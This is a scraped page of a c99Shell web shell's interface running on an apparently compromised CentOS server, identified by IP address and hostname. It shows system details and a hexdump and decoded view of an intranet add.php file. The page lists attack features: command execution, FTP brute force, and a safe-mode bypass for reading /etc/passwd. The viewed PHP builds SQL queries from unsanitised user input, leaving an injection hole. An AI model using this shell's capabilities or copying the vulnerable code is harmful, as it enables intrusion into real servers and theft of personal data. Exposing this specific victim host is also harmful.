110.164.51.230 - phpshell

!c99Shell v. 1.0 pre-release build #16!
Software: Apache/2.2.3 (CentOS). PHP/5.1.6 uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44 EDT 2010 i686 uid=48(apache) gid=48(apache) groups=48(apache) Safe-mode: OFF (not secure) /var/www/html/intranet/ drwxrwxrwx Free 52.64 GB of 127.8 GB (41.19%) Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout

!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686

uid=48(apache) gid=48(apache) groups=48(apache)

Safe-mode: OFF (not secure)

/var/www/html/intranet/ drwxrwxrwx
Free 52.64 GB of 127.8 GB (41.19%)
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout

Viewing file: add.php (793 B) -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |

Information:

Path	/var/www/html/intranet/add.php
Size	793 B
MD5	079caf55b42951d27420b2267b7ff727
Owner/Group	root/root
Perms	-rw-r--r--
Create time	06/07/2011 01:41:54
Access time	11/07/2024 10:33:18
MODIFY time	23/01/2007 15:48:38

FULL HEXDUMP

00000000
00000018
00000030
00000048
00000060
00000078
00000090
000000A8
000000C0
000000D8
000000F0
00000108
00000120
00000138
00000150
00000168
00000180
00000198
000001B0
000001C8
000001E0
000001F8
00000210
00000228
00000240
00000258
00000270
00000288
000002A0
000002B8
000002D0
000002E8
00000300
00000318

3C 3F 70 68 70 0D 0A 09 24 73 71 6C 20 3D 20 22 20 73 65 6C 65 63 74 20
2A 20 66 72 6F 6D 20 70 65 72 73 6F 6E 20 77 68 65 72 65 20 55 69 64 3D
27 24 74 78 74 55 69 64 27 20 6F 72 20 49 64 5F 43 61 72 64 3D 27 24 74
78 74 49 64 43 61 72 64 27 22 20 3B 0D 0A 09 24 72 73 20 3D 20 6D 79 73
71 6C 5F 71 75 65 72 79 28 24 73 71 6C 29 20 6F 72 20 64 69 65 28 22 53
51 4C 20 3D 20 24 73 71 6C 20 22 2E 6D 79 73 71 6C 5F 65 72 72 6F 72 28
29 29 3B 0D 0A 09 69 66 20 28 6D 79 73 71 6C 5F 6E 75 6D 5F 72 6F 77 73
28 24 72 73 29 20 3E 20 30 29 20 7B 0D 0A 09 70 72 69 6E 74 20 22 D5 D5
75 73 65 72 6E 61 6D 65 20 CB C3 D7 CD 20 C3 CB D1 CA BA D1 B5 C3 BB C3
D0 AA D2 AA B9 20 C1 D5 CD C2 D9 E8 E3 B9 C3 D0 BA BA E1 C5 E9 C7 20 E4
C1 E8 CA D2 C1 D2 C3 B6 E0 BE D4 E8 C1 A2 E9 CD C1 D9 C5 E4 B4 E9 3C 62
72 3E 22 3B 0D 0A 09 6D 79 73 71 6C 5F 66 72 65 65 5F 72 65 73 75 6C 74
28 24 72 73 29 3B 0D 0A 09 70 72 69 6E 74 20 22 3C 69 6E 70 75 74 20 6E
61 6D 65 3D 5C 22 62 74 6E 43 61 6E 63 65 6C 5C 22 20 74 79 70 65 3D 5C
22 62 75 74 74 6F 6E 5C 22 20 69 64 3D 5C 22 62 74 6E 43 61 6E 63 65 6C
5C 22 20 76 61 6C 75 65 3D 5C 22 C2 E9 CD B9 A1 C5 D1 BA 5C 22 20 6F 6E
63 6C 69 63 6B 3D 5C 22 68 69 73 74 6F 72 79 2E 67 6F 28 2D 31 29 5C 22
3E 22 3B 0D 0A 09 7D 20 65 6C 73 65 20 7B 0D 0A 09 24 70 77 64 43 72 79
70 74 20 3D 20 63 72 79 70 74 28 24 74 78 74 50 61 73 73 77 29 3B 0D 0A
09 24 73 71 6C 3D 20 22 20 69 6E 73 65 72 74 20 69 6E 74 6F 20 6D 61 73
74 65 72 5F 70 65 72 73 6F 6E 28 55 69 64 2C 50 61 73 73 77 6F 72 64 2C
49 64 5F 43 61 72 64 2C 50 72 65 66 69 78 2C 46 4E 61 6D 65 2C 4C 4E 61
6D 65 2C 41 64 64 72 65 73 73 2C 50 68 6F 6E 65 5F 4E 6F 2C 45 6D 61 69
6C 2C 47 69 64 29 22 2E 0D 0A 09 22 20 76 61 6C 75 65 73 28 27 24 74 78
74 55 69 64 27 2C 27 24 70 77 64 43 72 79 70 74 27 2C 27 24 74 78 74 49
64 43 61 72 64 27 2C 27 24 74 78 74 50 72 65 66 69 78 27 2C 27 24 74 78
74 46 4E 61 6D 65 27 2C 27 24 74 78 74 4C 4E 61 6D 65 27 2C 27 24 74 78
74 41 64 64 72 27 22 2E 0D 0A 09 22 2C 27 24 74 78 74 50 68 6F 6E 65 27
2C 27 24 74 78 74 45 6D 61 69 6C 27 2C 27 24 47 69 64 27 29 22 3B 0D 0A
09 6D 79 73 71 6C 5F 71 75 65 72 79 28 24 73 71 6C 29 20 6F 72 20 64 69
65 28 22 53 51 4C 20 3D 20 24 73 71 6C 20 22 2E 6D 79 73 71 6C 5F 65 72
72 6F 72 28 29 29 3B 0D 0A 09 70 72 69 6E 74 20 22 E0 BE D4 E8 C1 A2 E9
CD C1 D9 C5 CA C1 BA D9 C3 B3 EC 3C 62 72 3E 22 3B 0D 0A 09 7D 0D 0A 3F
3E

<?php   $sql = " select
* from person where Uid=
'$txtUid' or Id_Card='$t
xtIdCard'" ;   $rs = mys
ql_query($sql) or die("S
QL = $sql ".mysql_error(
));   if (mysql_num_rows
($rs) > 0) {   print "ХХ
username ЛГЧН ГЛСКєСµГ»Г
РЄТЄ№ БХНВЩиг№ГРєєбЕйЗ д
БиКТБТГ¶аѕФиБўйНБЩЕдґй<b
r>";   mysql_free_result
($rs);   print "<input n
ame=\"btnCancel\" type=\
"button\" id=\"btnCancel
\" value=\"ВйН№ЎЕСє\" on
click=\"history.go(-1)\"
>";   } else {   $pwdCry
pt = crypt($txtPassw);
$sql= " insert into mas
ter_person(Uid,Password,
Id_Card,Prefix,FName,LNa
me,Address,Phone_No,Emai
l,Gid)".   " values('$tx
tUid','$pwdCrypt','$txtI
dCard','$txtPrefix','$tx
tFName','$txtLName','$tx
tAddr'".   ",'$txtPhone'
,'$txtEmail','$Gid')";
mysql_query($sql) or di
e("SQL = $sql ".mysql_er
ror());   print "аѕФиБўй
НБЩЕКБєЩГім<br>";   }  ?
>

HEXDUMP: [Full] [Preview]
Base64: [Encode] [+chunk] [+chunk+quotes] [Decode]

:: Command execute ::
Enter:	Select:

:: Shadow's tricks :D ::
Useful Commands Warning. Kernel may be alerted using higher levels	Kernel Info:

:: Preddy's tricks :D ::
Php Safe-Mode Bypass (Read Files) File: eg: /etc/passwd	Php Safe-Mode Bypass (List Directories): Dir: eg: /etc/

:: Search ::

:: Upload ::

:: Make Dir ::

:: Make File ::

:: Go Dir ::

:: Go File ::

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0104 ]--